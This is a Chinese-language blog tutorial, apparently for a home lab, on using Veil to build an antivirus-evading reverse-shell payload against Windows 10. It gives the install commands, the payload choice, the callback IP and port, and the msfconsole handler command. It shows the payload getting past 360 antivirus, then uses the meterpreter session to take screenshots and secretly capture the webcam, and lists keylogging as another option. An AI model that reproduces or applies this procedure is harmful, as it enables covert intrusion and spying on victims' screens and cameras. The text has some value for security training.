Veil生成免殺payload 滲透win10 獲取靶機shell

一:實驗環境

兩臺機器處於同網段

攻擊機:kali 192.168.115.134 

靶機:win10 192.168.115.1

二:Veil下載、安裝、使用

kali裏默認沒有安裝Veil,我們通過命令行安裝:

 apt-get update && apt-get install veil

安裝過程有點漫長,如果用的國內源可能會快點。

安裝完成後啓動Veil

 

關於用法上述圖片英文寫的很明白

這裏我們使用1) Evasion

list列出可用的有效載荷

payload共有41種,這裏我選擇 13號的cs/shellcode_inject/virtual.py
 

進行演示! 從上面可以清楚看到11號payload有很多選項,在這個界面,我們可以對該 payload 進行一些基本的配置。

然後運行"generate"生成有效載荷,我們選擇4帶有shellcode的有效載荷。這裏會要求輸入本機的IP:192.168.115.134和該payload使用的端口,我們設置爲9999端口

下圖可以看到成功完成以上編譯後,編譯後的文件被保存在 /var/lib/veil/output/compiled/uzi.exe
下。同時新生成的 shellcode 的 rc 文件也被保存在了 /var/lib/veil/output/handlers/uzi.rc下!既然有了 rc 文件,那麼我們就可以方便的利用 MSF 進行調用了

在生成的 shellcode 的 rc 文件目錄下運行

msfconsole -r uzi.rc 

通過session -i發現並未有連接建立這是因爲我們的shellcode文件還沒運行。在靶機運行我們的shellcode文件前,來個小插曲我們用360檢驗下它看能否免殺。

結果顯示360殺毒並未進行查殺,所以我們繞過了殺毒軟件。然後在靶機運行該.exe程序。kali立馬監測到連接建立。輸入sessions -i發現ID爲1的連接建立

運行sessions -i 1與ID爲1的連接會話獲取靶機的shell

然後我們就可以實現一些操作比如,獲取靶機,屏幕截圖,用靶機的攝像頭,拍攝照片,鍵盤監聽文件上傳等。我在這裏演示其中兩個:

用screenshot命令獲取靶機屏幕截圖,然後保存在下圖所示目錄

我們用命令行查看下圖片

root@kali:~# dislpay /var/lib/veil/output/handlers/QRFWNXhM.jpeg

 

下面來點更刺激的,用靶機的攝像頭拍攝照片

命令是:

meterpreter > webcam_snap 

 

輸入命令查看

root@kali:~# display /var/lib/veil/output/handlers/leUhWlQC.jpeg

本人太醜所以用可愛的小兔兔代替了。

更多操作參考:https://blog.csdn.net/nzjdsds/article/details/77916706

本教程僅供學習交流

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章